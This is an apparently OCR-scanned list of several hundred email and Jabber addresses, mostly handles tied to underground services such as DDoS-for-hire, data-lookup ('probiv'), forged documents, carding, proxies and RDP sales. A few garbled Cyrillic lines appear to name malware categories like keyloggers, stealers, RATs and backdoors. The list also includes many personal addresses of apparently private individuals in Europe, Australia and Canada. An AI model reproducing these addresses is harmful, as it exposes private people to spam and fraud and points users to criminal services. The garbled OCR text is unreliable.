doncarlo@xabber.org 
samuraiddos@xmpp.jp 
block123@xmpp.jp 
Grabber78@protonmail.com 
support@shtopor.bz 
denissokol1986@gmail.com 
socolde@jabber.ru 
locbtc@wwh.so 
japonec@exploit.im 
ninjajewish@gmail.com 
support@hacktougroup.ru 
hacktougroup@gmail.com 
smoyk.goodxak@gmail.com 
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support@joehack.me 
warmachine84@jabber.ru 

ideal _shop@exploit.im 
drawingdocm@xmpp.jp 
drawingdocm@jabber.ru 
olgamuzhilovska@gmail.com 
messil2345@jabber.ru 
Messi1l2345@xmpp.jp 
alextramp555@gmail.com 
masterofstamp1391@gmail.com 
serv _rivz@zloy.im 
shah.chase.70@gmail.com 
aaazews@jabbim.cz 
raykon88@xmpp.jp 
vladdomkrat@jabber.ru 
business2018@protonmail.com 
business2018@exploit.im 
finansabn@gmail.com 
maximenkokirill@yandex.ru 
parket-rai@yandex.ru 
mazzyman@yandex.ru 
nata-kramar2012@yandex.ru 
milovashka1997@yandex.ru 
chajjj@yandex.ru 
cubanchik@exploit.im 
begdjanov@bk.ru 
voron7b93@xmpp.jp 
rainer.zilch@t-online.de 
fjlamberty@t-online.de 
x2series@yahoo.co.jp 
artemiewa.polia2018@yandex.ru 
BojenEgorov@yandex.ru 
TihomirLazarev1995@yandex.ru 
dima.gostemilow@mail.ru 


mixail-yaxnin@mail.ru 
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gblagowidowa@mail.ru 
ezyfx@mail.ru 
davian.cult8841@gmail.com 
niore@exploit.im 
joker99@jabber.ru 
73206682@qip.ru 
diplomist555@gmail.com 
ojegard@exploit.im 
jogpng@exploit.im 
berthogen@yandex.ru 
netgrad@jabb.im 
jum@exploit.im 
jum@sj.ms 
mishakamon@exploit.im 
zloi-bober@tuta.io 
zloi-bober2@xmpp.jp 
humman@exploit.im 


D Kpunrope: | J>xofinepei 


$2) Keiinorrepe: | Crnnnepes | [pa6Gepe 
Qs 2) DDoS « DoS micrpymetre: | Crpeccepst 
2, ) PAT] Baxqope: | PMC | Jaynnoageper 
2) Bpyret | Mapcepes | Cranepn 

Perrept: | Bote | Yexepes 
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BAe KR | Kom 
reklama-na-dm@darkjabber.cc 
poho@xmpp.jp 

gusi@jabme.de 
teli@pandion.im 
zzz77@xmpp.jp 
hackstoviber@gmail.com 
79219888374@mail.ru 
kopas522@jabber.dk 
viktornevara@conversations.im 
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viktor@conversations.im 
vse626@jabber.ru 
playbot service@exploit.im 
huliganl1@jabber.cz 
lexoss@exploit.im 
probiv@jabster.pl 
perls@protonmail.com 
bizpartner@uproad. biz 
meegaboxx@xabber.org 
flrm4@yandex.ru 
Sergeywhitemoney@default.rs 
plusminus22@xabber.org 
Clav@xabber.org 
sashka@swissjabber.ch 
nttl889@yandex.ru 
kissa77@xmpp.jp 
bmarket@xmpp.jp 
tehosmotr.avto@gmail.com 
Egormumaev@jabber.ru 
egor.mumaev@yandex.ru 
nikromang@zloy.im 
nikromanng@zloy.im 
komal@exploit.im 
freshbase@xmpp.jp 
zdesign@jabber.cd 
rudbacknud@secmail.pro 
youknown@exploit.im 
shahovdata@gmail.com 
silver5@sj.ms 
qwippu@xmpp.jp 
babay@dukgo.com 
jviapk17@vipole.com 
bestlk@darkjabber.cc 
Akella666@jabber.ru 
qwopask|@exploit.im 
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richimyy@zloy.im 
zaim2018.rf@gmail.com 
exploits@sj.ms 
assb7@securejabber.me 
roman77714@jabber.ru 
dart737@jabber.ru 
ebomb@xmpp.jp 
lolzal@xmpp.jp 
natali.birskaya@mail.ru 
vityavityaev288@mail.ru 
karma@wwh.so 
klimm@magamba.org 
magnumo@bk.ru 
tytova.ol@mail.ru 
profan@protonmail.com 
mi7@zloy.im 
sagatyk@jabber.ru 
sagatyk@protonmail.com 
amatory@jabber.ru 
dmxdark@xmpp.jp 
klod91@list.ru 
xopoho.odet@mail.ru 
akabar.tea@xmpp.jp 
seeqereva@gmail.com 
transbtc@exploit.im 
sms-nl@xmpp.jp 
urhelp77@yandex.ru 
qwertaxell@xmpp.jp 
t_power@exploit.im 
Z668@exploit.im 
heisenberg bro@xmpp.jp 
aurelioooooo@yahoo.com 
asFuck444@jabbim.cz 
nomerxxx@xmpp.jp 
FastHackTeam@gmail.com 
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zalivservis@mail.ru 
KrosDDos@jabber.ru 

Khan Service@securejabber.me 
AlexxK@sj.ms 
aug.fibonacci@gmail.com 
special.infofenix@gmail.com 
max69@wwh.so 
btckonvertbot m@exploit.im 
100100@xmpp.ru 
100btc.pro@gmail.com 
13FriendsSerogo@gmail.com 
glov@xmpp.jp 
genom100@xabber.org 
mega.mind@xmpp.jp 
mr.shadow@darkjabber.cc 
narajanamaxi@xmpp.jp 
slonstepup@dukgo.com 
thunderlove@xmpp.jp 
Ijal992@jabber.ru 
dantist077@jabber.ru 
AFC95@Yandex.ru 
socks@rusdot.com 
support@rsocks.net 
0x000@darkjabber.cc 
1@jabber.24xbtc.com 
685869462@xmpp.ru 
blabal@mail.ru 
wqeqwe421@gmail.com 
kindunkind@jabb.im 
kindunkind@thesecure. biz 
android2011@xmpp.jp 
artcoding@exploit.im 
fuhad@jabber.ru 
amazonrefund@jabbim.cz 


brookli _store@xmpp.jp 
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brooklin store@xmpp.jp 
anakondatut@xmpp.jp 
sumrakOO00O@xmpp.ru 
Xarison9000@xmpp.jp 
tempod@xmpp.jp 
simon77@darkjabber.cc 
samovar@jabme.de 
scano@exploit.im 
tuono@xmpp.jp 
lisa-friebe@arcor.de 
jenniferhartrodt@freenet.de 
philippe.germain8@wanadoo.fr 
piotrek1110@interia.eu 
darknesfall11@t-online.de 
dragnes@1337.no 
catherine.lamy@neuf.fr 
alicia.schad@t-online.de 
thomas.renck@t-online.de 
mrcabdriver@tiscali.co.uk 
kevin.saliceti@laposte.net 
wickheiko@t-online.de 
florian-benz@t-online.de 
yves.patelout@wanadoo.fr 
r.fernandez1@noos.fr 
p-quel@t-online.de 

lukas _grimmer@t-online.de 
polei666@t-online.de 
valmi94@wanadoo.fr 
darksoild@freenet.de 
philippe.conard0123@orange.fr 
guicalmon@globo.com 
pcusin@alice.it 
chesterteddy@t-online.de 
mougenot.aurelia@neuf.fr 
geryi@wanadoo.fr 
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cdvd98@interia.pl 
wiktorcisek331@interia.pl 
steph david@orange.fr 
patrick. patou@sfr.fr 
xbox36017@t-online.de 
natia@op.pl 
maksimka.rogolev@mail.ru 
ss.iv.sS@yandex.ru 
grisha.mazov@mail.ru 
romka198311@mail.ru 
epmak95@mail.ru 
kanaev.055@mail.ru 
linleykilgore@windstream.net 
cianzacl11@charter.net 
dude2007@ntlworld.com 
dyingmuse@ntlworld.com 
connorbush@charter.net 
bhuehns1@cox.net 
wendygehlert@charter.net 
rich _ball@ntlworld.com 
azdena2@cox.net 
plewiv@cox.net 
tlo2f@charter.net 
rollandnelson@cox.net 
i555555@xmpp.jp 
9mc@exploit.im 
socks31337@gmail.com 
umumisap@ip.iennfdd.com 
lincolndesign@exploit.im 
VipSecurity@xmpp.jp 
blackservers@exploit.im 
igrok2836@xmpp.ru 
igrok09371@gmail.com 
hosting@ufolabs.pro 
ccvata@prv.st 
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doomsday@xmpp.jp 
qyservers@tuta.io 
qyservers@exploit.im 
prostie-resheniya@yandex.ru 
prostie-resheniya@hotmail.com 
prostie.resheniya.rus@gmail.com 
nishebrod@abushost.ru 
maloibtc@gmail.com 
misha@mail.ru 
accounts.top@mail.ru 
raputa@meether.ml 
Sheppard@exploit.im 
support@advanced.name 
ceo@advanced.name 
arap@exploit.im 
affillates@affilight.com 
MAIL-alwaysinbusiness@tutanota.com 
al.banner@chatme.im 
AlexTrusk@xmpp.ru 
gluxoffmax@richim.org 
advsale@unstable.nl 
staronoff@yandex.ru 
smm.service@yandex.ru 
nikrasna@exploit.im 
keanumatrix@exploit.im 
keanusfhirazmatrix@exploit.im 
support@gda-shop.ru 
BalanceMasterCash@yandex.ru 
luyten@jabb.im 
vtop.one@mail.ru 
ActivatorSMS@yandex.ru 
SMSactivator@exploit.im 
AL.Service@deepweb.bz 
western@xmpp.jp 
alldocs@zloy.im 
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seller322@exploit.im 
alonart@xmpp.jp 
alonartl2@gmail.com 
support@altvpn.com 
floraby12@jabber.ru 
baserunner80@yahoo.com 
businessss@jabb3r.org 
metaljet@xmpp.jp 
zanozasmoroza@gmail.com 
zlaya sobaka@exploit.im 
amazydesign@OnllLne.at 
samuilvell@xabber.org 
acogunxio198635@mail.ru 
freegoin@exploit.im 
ibersys@exploit.im 
bearishversa@xmpp.co 
eror404@exploit.im 
codenamel1911@dukgo.com 
droidmashin@exploit.im 
kuberal08@xmpp.jp 
Revan _Knight@exploit.im 
support@safe-inet.com 
billing@safe-inet.com 
support@insorg.org 
mrfreeman22@dukgo.com 
nickname@utox.org 
timeismoney@exploit.im 
timeismoney5@wwh.so 
Tristan.grob@gmail.com 
btit _sale@xmpp.jp 
manager@in-disguise.com 
anonpaste@protonmail.com 
blacktds@thesecure. biz 
blacktds@exploit.im 


blacktds.com@gmail.com 
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krashen115@mail.ru 
fannylifel3@xmpp.jp 
varsik@exploit.im 
arbuzikihost@exploit.im 
info@artcash.net 

Asguard manager@exploit.im 
support-asguard@jabber.pw 
office@asguard.pro 
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Asguard2323@jabber.pw 
vpn@asguard.pro 
vpn _support@asguard.cc 
vpn _support@jabber.pw 
debetka@jabbim.pl 
doc _tor@jabber.ru 
mardgear@exploit.im 
avalonpr@xmpp.jp 
melissa _ivanovna@swissjabber.ch 
8662371@exploit.im 
serggikOO@pandion.im 
graf2017@xmpp.jp 
Jabber-MarlbOrO@monopoly.cc 
kazanceva@xmpp.jp 
cosmote@jabber.ru 
candy-shop2012@maail.ru 
kostya eremin _2016@mail.ru 
avia@jabbim.com 
sky _trip@rows.io 
sky _trip@jabber.otr.im 
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sky _trip@jabber.ccc.de 
Kolyasport@jabber.ru 
zerkal2@yandex.ru 
azida@list.ru 
nikskvor@mail.ru 
kumi.okt@yandex.ru 
zelezniychelovekk@yandex.ru 
ntroy@exploit.im 
ankakakaFraphosi@gmail.com 
udiuogq@mail.namnerbca.com 
karlosmaiami@yax.im 
fortpost@xmpp.jp 
Philosopher47@yax.im 
2019zaliv@gmail.com 
support@sms-online.pro 
install. money@thesecure. biz 
dstamp12345@gmail.com 
garidi@xabber.org 
graver@exploit.im 
crydbrox@sj.ms 
duke.eugene@xabber.org 
dominik toretto@xmpp.jp 
DarkMen123@exploit.im 
sergvoronin.0l1@gmail.com 
support@baksman.com 
vip.person@baksman.org 
virull.exe@xmpp.ru 
snizez@yahoo.com 
tyrok44@xmpp.jp 
firma9153776804@yandex.ru 
detalist@xmpp.jp 
help@detalist.info 
mopsik@exploit.im 
joehackme@exploit.im 


goldman@darkjabber.cc 
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hotels-booking@pandion.im 
p.griffin80@rambler.ru 
semilyal7@gmail.com 
baron88@xmpp.jp 
Sunset@sj.ms 
DBS884KPT@jabber.ccc.de 
Retrolook@yandex.ru 
keywords-club@yandex.ru 
Bikutganowalzabella@mail.ru 
demyanko-lariska@mail.ru 
SvetlanaChernenkowa@mail.ru 
gena.yanyuk@mail.ru 
ZinaFarkina74@mail.ru 
ela.gubatowa@maail.ru 
RomanAgdavletov@mail.ru 
libralibra@xmpp.jp 
db4sale@exploit.im 
mail@example.com 
fuckstrot@jabber.ru 
johnny.d.dillinger@yandex.ru 
qasik86@mail.ru 
bdannyx@inbox.ru 
alex.makarov.leads@mail.ru 
atr3yu@xmpp.jp 
greeny.atrey@protonmail.com 
babkivdele@xmpp.jp 
starinahenki@zloy.im 
darkside@dlab.im 
jamb@jabbim.com 
m-wasya@mail.ru 
chekok@jabster.pl 
haman89@xmpp.jp 
0sa1237.123@yandex.ru 
italy83@jabbim.cz 
shaman89@xmpp.jp 
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popl17@jabber.de 
Sezam1913@gmail.com 
sever0ever@gmail.com 
brigadir@jabber.ru 
sesmoby@gmail.com 
babavala@protonmail.com 
tfs@exploit.im 
markshultsz@pm.me 
120012@i.ua 
wendix@jabber.ru 
coop@yax.im 
ilkatel@mail.ru 
cmaster1900@xmpp.jp 
alexpetrov3123@gmail.com 
answerkey@jabbim.com 
Ivanov.ivan@mail.ru 
info@yandex.ru 
site@berileads.ru 
malakhov@jabber.at 
admin@wazzup.su 


Angedoniya@exploit.im 


Orlandini vivetto@protonmail.com 


ostino@jabb.im 
help@vektort13.pro 

mr _vendor@xmpp.jp 
yphar@securejabber.me 
help@airsocks.in 
gorhopt@yandex.ru 
support@best-proxies.ru 
olidiyal993@mail.ru 
sserviss.zal@inbox.ru 
mir.zaliv@bk.ru 
veceslavurapov@gmail.com 
prodev@stronzi.org 


prodev@toxme.io 
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spysoftnet@tutanota.com 
ivamaxpost@protonmail.com 
butno@exploit.im 
asteriksmoo@exploit.im 
boobonx@exploit.im 
eriknetwalker@exploit.im 
hilton@wwh.so 
baronl12@jabber.ru 
mail@inbox.ru 
d0205toff@xmpp.jp 

Hic 99@jabber.ru 
ofiyefexi@lak.fusdren.com 
Expocod@protonmail.com 
7@wwh.so 
bitmixbiz@blackjabber.com 
bitmixbiz@protonmail.com 
sigen@jabber.ru 
bitokcc@exploit.im 
tramprutor@xmpp.jp 
armadagarant@xmpp.jp 
avos@probiv.me 
osago@myrambler.ru 
blackpointverifl@xmpp.jp 
abrazor@jabber.ua 
balabanov@exploit.im 
amigo trade@xmpp.jp 
kasko.osago2015@yandex.ru 
do299@yandex.ru 
mechanic.osago@yandex.ru 
osagol78@gmail.ru 
do299@mail.ru 
osagomx@gmail.com 
waveenergy33@gmail.com 
avto-dokumenty@mail.ru 
producer59@exploit.im 
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block _service@xmpp.jp 
block.serviceO@gmail.com 
ksy7soft@gmail.com 
ksenia@richim.org 
alextroo@jabber.ru 
boosthosting@xmpp.jp 
boosthosting2@xmpp.jp 
lexxx123@Onl1Lne.at 
theend1@exploit.im 

by _matrixa@jabber.ru 
tro9n@exploit.im 
dragn@xmpp.jp 
s3ller@exploit.im 
S3ller@protonmail.ch 
delimc@sj.ms 
jmsbot@jabber.ru 
support@jmsbot.com 
jmsbot@default.rs 
vipzona@dukgo.com 
cicada@tenec.cc 


dev.tenebris@exploit.im 


dev.tenebris@jabber.calyxinstitute.org 


sphere@tenebris.cc 
contact@briarproject.org 
favoryt@xmpp.jp 
federalket@exploit.im 
brutebro@mail.ru 
senseynot@gmail.com 
btc.club@exploit.im 
btc.club@sj.ms 
btcex.biz@gmail.com 
korot.ira@yandex.ru 
admin@mysite.com 
sportcartel@exploit.im 


julesbonnot@procrd.pro 


8137 


buransupport@xmpp.jp 
111112001 @pandion.im 
abc111112001@gmail.com 
Lewus89@jabbim.sk 
iral87654@gmail.com 
proxyam@exploit.im 
support@proxy.am 
diego222@xmpp.jp 
mr.crowley@exploit.im 
evgermolaev123@yandex.ru 
pechkin@jabber.se 
supportssh@exploit.im 
lanbin@xmpp.jp 
support@lanbin.ru 
deaconfrost222333@gmail.com 
danlaneser@gmail.com 
alhimikpro@inbox.ru 
cod3r@expoit.im 
gjr007@bigpond.net.au 
lisa.phammy@gmail.com 
jarredmcmanus@hotmail.com 
joanna-claire@hotmail.com 
Morton@davidandtaru.com 
lukejepsen@gmail.com 
di.scheimer@gmail.com 
neil.goodwill@gmail.com 
sharonk30@gmail.com 
jimanjenl@gmail.com 
Mishjmiller@hotmail.com 
priscilla.oryans@hsf.com 
redwineandcoffee@hotmail.com 
peter.rodgers@makeyourpoint.com.au 
paula.iwan@optusnet.com.au 
Gregodea@gmail.com 
loumeng _O@hotmail.com 
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p.a.negus@skymesh.com.au 
acwilkins@bigpond.com 
dipembert@gmail.com 
dheap@westnet.com.au 
haydyn.wood@outlook.com 
cliffsand@gmail.com 
lis.garrett3@gmail.com 
Fiona.reed@rfcapital.com 
darlingpoint@gmail.com 
capitalview1@outlook.com 
obuhel@gmail.com 
lawrence.lau@rogers.com 
jen.noort@gmail.com 
eesnelling@gmail.com 

e _alvaradol@hotmail.com 
gwgoulding@rogers.com 
dd13properties@gmail.com 
Ruthie458@me.com 


amberandgregory@gmail.com 


Amiraliblue.fatemi@gmail.com 


mileto.franca@gmail.com 
claarhoven@sympatico.ca 
Jcapaldo42@gmail.com 
Rae1l5@rogers.com 
jroper@cyg.net 
Nick@nickpavlov.com 
jeddulin@gmail.com 
heinlemt@yahoo.com 
ccsimion@rogers.com 
mmandula@gmail.com 
Hcraib@gmail.com 
s.vance@rogers.com 
gelozamora21@ymail.com 
patrickmclellan9@gmail.com 
Juliahodgins@yahoo.ca 
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neginmn@yahoo.com 
KaleNotShale@gmail.com 
Ki.lindain@gmail.com 
Lijharmston@shaw.ca 
marcogiambattista@hotmail.com 
andrew.leon5@gmail.com 
alynne0O0O@hotmail.com 
alessandra.travali@gmail.com 
shlomi _toledo@hotmail.com 
ainavb96@hotmail.com 
benzhit@gmail.com 
isaac6357@gmail.com 
Maayanrome2017@gmail.com 
liarothSO02@gmail.com 
dan19620702@gmail.com 
veredreit@gmail.com 
babymix99@gmail.com 
Evebatten@aol.com 
mkvacenas@yahoo.com 
aarongarrigan@gmail.com 
gabrielletweeti@aol.com 
taranissi@yahoo.com 
iwillukacova@gmail.com 
melaniapaduraru@yahoo.com 
lesleym04@yahoo.com 
riadirmouli@outlook.com 
cyrusjohn _malonzo@yahoo.com 
lisagracesmith@aol.com 
amandalcatlow@yahoo.co.uk 
clarekneebone@gmail.com 
sallyow@hotmail.co.uk 
Bhavna _lad@hotmail.co.uk 
Rebeccaabunn@gmail.com 
andrewcluckett@aol.com 
samandvickilee@gmail.com 
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clegz@hotmail.co.uk 
Ikkenyon@hotmail.co.uk 
Pmkostenurka6@gmail.com 
jimbeefl@gmail.com 
kathryn@sault.org.uk 
guilar@blueyonder.co.uk 
olliemead@me.com 
Juliet.foxwell@gmail.com 
mihomurata9113@yahoo.co.jp 
Adamroberts888@yahoo.co.uk 
serreta.pritchard@ntlworld.com 
Williame _wilson@hotmail.com 
edwina.davey@yahoo.co.uk 
akmossgibbons@yahoo.co.uk 
Idrivearocket@hotmail.com 
barbaralucy@aol.com 
barry.kirk@waitrose.com 


abbieneal@hotmail.com 


emmatompkins@mobile-webmail.co.uk 


jdgertenbach@gmail.com 
davidw385@aol.com 
i.marisina@gmail.com 
ira.marisina@mail.ru 
Efelman@hotmail.com 
jacobchg _2348@hotmail.com 
lujiaojiaol2@163.com 
Janko.venhorst@googlemail.com 
rionalofthouse@hotmail.co.uk 
ouraoife93@sky.com 
Casymonkey@hotmail.com 
laurenmayor@hotmail.co.uk 
jannine445@hotmail.com 
jamie1490@hotmail.co.uk 
katie.waghorn@yahoo.com 


melock100@gmail.com 
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swiftmj2003@yahoo.co.uk 
nick.watson69@me.com 
jessica.ford@live.co.uk 
meverett48@aol.com 
mrumble5@hotmail.co.uk 
ahbok828@gmail.com 
lesley.taylor75@hotmail.co.uk 
emilyrosemae@hotmail.com 
Kev17walker@btinternet.com 
pranavdaryanani@gmail.com 
levina _raharja@hotmail.com 
Lauragoodfellow86@gmail.com 
emma _gb@hotmail.co.uk 

Pr _abraham@yahoo.com 
Asutherland60703@aol.com 
jnoel666@sky.com 
michaelkeetley@hotmail.co.uk 
ojbran@outlook.com 
francescamather@hotmail.com 
Alexmah@hotmail.co.uk 
Fabbitbabbit@yahoo.co.uk 
claire.thomas1440@gmail.com 
shreden@jabber.root.cz 
superded@sfletter.com 
rapul5@jabber.cd 
ifsey@xmpp.jp 
support@changex.com 
helium@jabber.ru 
dada1222@exploit.im 
basedeltazero@xmpp.jp 
basedeltazero@keemail.me 
Scaut.Php@exploit.im 
zennoboss@ya.ru 
ebadax@mail.fusdren.com 


GrishaBaron@talkonaut.com 
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chernomorbank@jabber.at 
komrakoff.supp@gmail.com 
sipsen@securejabber.me 
dravilik@mail.ru 
fiesta777@exploit.im 
fiesta777@protonmail.com 
Ogonek1414@mail.ru 
ssh4discount@xmpp.jp 
asori@exploit.im 
pr24group@exploit.im 
evapgab@mailer.fusdren.com 
consciousness@ninja.im 
viktorsobolev007@gmail.com 
indenhat6789@gmail.com 
pahan0772@xmpp.jp 
CLUB32@xjabber.org 
megatrafferl@exploit.im 
Urwerk@suchat.org 
corpmail@darknet.im 
jmm50@exploit.im 
bluetooth@exploit.im 
rlllse@xmpp.jp 
kolayder.derl132@xmpp.jp 
neizvestnost74@jabber.cd 
Andryusha _94@mail.ru 
Andryusha 94@bk.ru 
artflower@linuxlovers.at 
davidsek@zakazmarketing.ru 
preacher@xmpp.jp 
darksender@mail.ru 
dizalner@xmpp.jp 
topmoneymaking@fromru.com 
schraeder@default.rs 
s.job@zloy.im 
badboy92@exploit.im 
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DaVinci Support@zloy.im 
Davinci Supp@yahoo.com 
Op3nalls@gmail.com 
x99euro@xmpp.jp 
x99euro@protonmail.com 
x99euro@jabber.ru 
sergeyshikshinoff@gmail.com 
atomddos@exploit.im 
OTR-atomddos@exploit.im 
ddosking@exploit.im 

503 service@xmpp.jp 
zloi-bober@xmpp.jp 
anubisddos@xmpp.jp 
cyberblaster@exploit.im 
legalddos@exploit.im 
athena _owl7@exploit.im 
Athena _owl7@exploit.com 
netuser@xmpp.jp 
fedotov@darkjabber.cc 
falcone@crypt.am 
cardex@blah.im 
raketnoy2@vipole.com 
stars@pandion.im 
bakery@exploit.im 
dad4z@xmpp.jp 
inform@audia6.cc 
17@glov.io 

johnny _cash4@xmpp.jp 
xxlxxlI@xmpp.jp 
XXL@jabbim.cz 
XXL@jabbim.com 
XXL@jabber.cz 
lauderdale@jabbim.com 
XXL@jabber.root.cz 
XXL@njs.netlab.cz 
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cherep1488@jabber.ru 
mega.sergeeva@yandex.ru 
fm.dc@jabme.de 
Jabbersuper@jabber.ru 
volkov15.volkov@yandex.ru 
qq97@ya.ru 
john.white.91@bk.ru 
brutbO@jabber.ru 
brutbO@yandex.ru 
ineveraskedforthis11@gmail.com 
ineveraskedforthis@xmpp.jp 
mkz@xmpp.ru 
genesisZ@jabb.im 
djin777@darknet.im 
rrmak@jabber.cz 
DedicDron@yandex.by 
mr.dedication@mail.ru 
bestrdpshop@pandion.im 
Ollmp@xmpp.jp 
ravel488@exploit.im 
ravel488@wwh.so 
seller-server@mail.ru 
seller-server@zloy.im 
Recall9991@gmail.com 
claw _host@jabber.ru 
passpor2@exploit.im 

tom _braun@xmpp.jp 
netppl@jabbim.com 
nikintOO7aye@xmpp.jp 
antimail@xmpp.jp 
feedback@dominos.ru 
13day@exploit.im 
brabus@wwh.so 
ffinspb@gmail.com 
Debyan@jabber.ru 


8145 


goodwin3005@xabber.org 
anton.poller@gmail.com 
erdogan.celebi@web.de 
enderboeluek@web.de 
p.brzinzky@web.de 
anneopthoog@hotmail.com 
dennisgustaf@gmail.com 
maergol@yandex.ru 
bizvot@mail.ru 
pianist@probiv.me 
mwwme@protonmail.com 
k.b-supp@list.ru 
b.sup77@gmail.com 
jabber-andrichan@wwh.so 
-andrichan@wwh.so 
probivl1@protonmail.com 
FSeller@exploit.im 
theways@bk.ru 
theways@jabber.ru 
npopok8800@xmpp.jp 
Qasix@exploit.im 

vilasko _doc@protonmail.com 
127001 @tenec.cc 
electrosoft409@gmail.com 
andrew077@jabber.ru 
vova270363@gmail.com 
support@dichvusocks.us 
diplompro@tuta.io 
leon.avin@xmpp.jp 
leon.avin@tuta.io 
diplom.msk@gmail.com 
apinelchik@securejabber.me 
conscience@exploit.im 
zero@prv.st 
Meduzal2p@protonmail.com 
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androidskim@exploit.im 
par7272@xmpp.jp 
par7272@exploit.im 
smartdocs@exploit.im 
docs777@jabber.otr.im 
Golden-Lion@zloy.im 
doccreator@zloy.im 
docvictory@jabber.ru 
Clyde.Barrow@exploit.im 
zaz@exploit.im 


siordiya@jabber.ru 
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van-gogh@jabber.de 
7778999@zloy.im 
info@vsem-doki.ru 
doki@gmail.com 
cloud2210122@gmail.com 
info. vsemdoki@gmail.com 
karatni@jabber.ru 
dokisng@gmail.com 
worlddocs@exploit.im 
anticollector@protonmail.com 
sugar88@exploit.im 
ivan.grankin.95@bk.ru 
edem@vovlad.ru 
otoeaisto@gmail.com 
mppto@yandex.ru 


scornekov@mail.ru 
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info@astolider.ru 
triptaxi@pandion.im 
bb.not@jabber.hot-chilli.net 
dox box@exploit.im 
sekretik@xmpp.jp 
etik@xmpp.jp 
litecoin@xmpp.jp 

marina bespalova_1982@mail.ru 
Magnus.pride@gmail.com 
Qunc@zloy.im 
mixika@jabbim.com 
support@chigurh.is 
mers-dogovor@mail.ru 
krapivaserg1988@gmail.com 
tenz@exploit.im 
aaronlaforce@yahoo.com 
voland a@xmpp.jp 
butch13@exploit.im 
richwitchh420@xmpp.jp 
support@exploit.im 
petr.2033@gmail.com 
fns.consalt7 7@gmail.com 
alpha.brodilkin@jwchat.org 
ynyan@jabber.ru 
yarik198111@exploit.im 
bostonfull@xmpp.jp 
golllandec@gmail.com 
notegoist@gmail.com 
prostar55@protonmail.ch 
Arsen1917@jabber.ru 
dmusin88@yandex.ru 
msr605@xabber.de 
cardcoderu@gmail.com 
alexabr@exploit.im 
eleos@msjb.pw 
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eleossup@msjb.pw 
elitevps@exploit.im 
elitevps@protonmail.com 
elitevps-tech@exploit.im 
elitevps@sj.ms 
smtpmail@jabber.cz 
smeil.meverik@xmpp.jp 
privateloader@hotmail.com 
enigmax@thesecure. biz 
eosago-1@bk.ru 
ohegexili@asdff.iennfdd.com 
walhalla777@tutanota.com 
serbit@pandion.im 
darkmoney@jabbim.ru 
usacreditcard@yandex.ru 
creditcardusa@jabbim.ru 
mrpink@exploit.im 
mrpink666@protonmail.com 
eurodocen@xmpp.jp 
forbud@xmpp.jp 
hittasource8@gmail.com 
hitta-source8@jabb3r.org 
Revus@jabber.ru 
demon.dokument@yandex.ru 
enouva@asdff.iennfdd.com 
catmin@exploit.im 
CatmiN66@tutanota.com 
exploitone@xmpp.jp 
linclude@bk.ru 
fvision@tenebris.cc 
narayana@pisem.net 
admin@farmproxy.ru 
supportff@xmpp.jp 
fastlionservice@protonmail.com 
info@probiv.cc 
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vipibit@xmpp.jp 
alexkey@zloy.im 
bitrix@exploit.im 
andreiviorelO3@gmail.com 
vairoketrud@zaim-fart.ru 
fincert@cbr.ru 
cbrcash@jabber.at 
cbrcash@protonmail.ch 
support@1vpns.com 
support@1jabber.com 
admin@1jabber.com 
admin@vipclub.pm 
LosAngelos@mail2tor.com 
ljabber@conference.1ljabber.com 
lvpns@1jabber.com 
firstvpn@jabber.cz 
kukareku@exploit.im 


kukareku22@protonmail.com 


John.4576@dukgo.com 
3amissvarvara777@list.ru 
missvarvara7/77@list.ru 
hot.phone.service@exploit.im 
hot.phone.service@gmail.com 
sipflood@Online.at 
sesmoby@xmpp.jp 
brogyga911@gmail.com 
floodservice@protonmail.com 
pesticideVIP@protonmail.com 
musalini@exploit.im 
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fludoff@jabberon.ru 
favorit@swissjabber.ch 
flooder@jabb.im 
dinastspb@jabbim.pl 

flood support@exploit.im 
docrot@exploit.im 
Docrot@darkjabber.cc 
cumsin@xmpp.jp 
azazel@jabbim.cz 
Akadem54@sj.ms 
gevorgchaturan77@gmail.com 
zalivala-lars@ajabber.me 
maker.money.garant@blackjabber.cc 
Billsmith63@xmpp.jp 
photoid@jabbim.com 
4kv2018@gmail.com 
moiproekt5prodazh@mail.ru 
DataLeaks@thesecure. biz 
LarastokO6@gmail.com 
narduzzi.ornella@gmail.com 
aldapischetta@hotmail.com 
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mobilesearch@vipole.com 
optimizations@i.ua 

vlad _len@exploit.im 


ninjabug@jabber-germany.de 


8171 


marvel@xabber.de 
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Nazarr787@yandex.ru 
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ahtoshkaa@gmail.com 
seo666@jabber.ru 
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waqgege@yandex.ru 
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kochetkov@zloy.im 
johnny312@exploit.im 
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ultracash@exploit.im 
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letithost@exploit.im 
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levipay@yandex.ru 
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dev.tenebris@securejabber.me 
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Sociopat@zloy.im 
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kritical88@xmpp.jp 
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fgtoyety@exploit.im 
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mastercrad@exploit.im 
andrey.malish@jabber.ru 
bozhenko.web@gmail.com 
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visa.canady@gmail.com 
kputuk@hot-chilli.net 
stasmerk1@gmail.com 
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travelo@pandion.im 
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valeradmitrenkow@gmail.com 
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pyka.blood@darkjabber.cc 
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obnal2019@yandex.ru 

8181 


i9o0revitchi@yandex.ru 
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dr.doc@xmpp.jp 
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megaprank@exploit.im 
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flappy@darkjabber.cc 
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sistema@jabber.ru 
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alexmalcev@jabber.cz 
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seregapsy7@jabber.ru 
whitehotice@protonmail.com 
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sllrdp@exploit.im 
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praim@jabber.ua 
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sauron.my.name@gmail.com 
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dasdfa32@mail.ru 
millennium@ooze.im 
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Lombrex23@jabber.ccc.de 
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endigo1234@jabber.ru 
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doublehelpv@xmpp.jp 
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osagotorg@jabbim.com 
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docdoc888@yandex.ru 
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qFoks@xmpp.jp 
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allresults.servis@gmail.com 
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darkweb101@xmpp.jp 
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vr-sms@mail.ru 
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pspasal@jabber.ru 
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annihilat@jabber.ru 
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dwv@securetalks.biz 
dwv@jidhad.biz 
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awwents@xmpp.jp 
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vasya@vasya.ru 
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anonymouscourier@yandex.ru 
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boosted@xmpp.jp 
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bumajnik@yahoo.com 
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offmanlabe@rambler.ru 
vk.ackaunt@yandex.com 
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svbazaev@mail.ru 
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powerfullddos@exploit.im 
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dolbonavt@xmpp.jp 
49kkj14381@dukgo.com 
02kkj14381@dukgo.com 


8189 


sveta.barolskaya@mail.ru 
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support@kupit-prava.cc 
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maks.m2s@yandex.ru 
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marketing@whitepays.com 
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vitocarleone@jabber.ru 
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rts7@protonmail.com 
admin@bitaps.com 
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kgbsssr@jabber.ru 
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scansdoc@jabber.ru 
scans-foto-doc@bk.ru 


8195 


vash _dokymentt@mail.ru 
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kaktycp@jabber.ru 
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walter@jabbim.cz 
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novoros7/77@xmpp.jp 
centrobank@sj.ms 
betterwritesaul@sj.ms 
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melnik.yaroslav@yahoo.com 
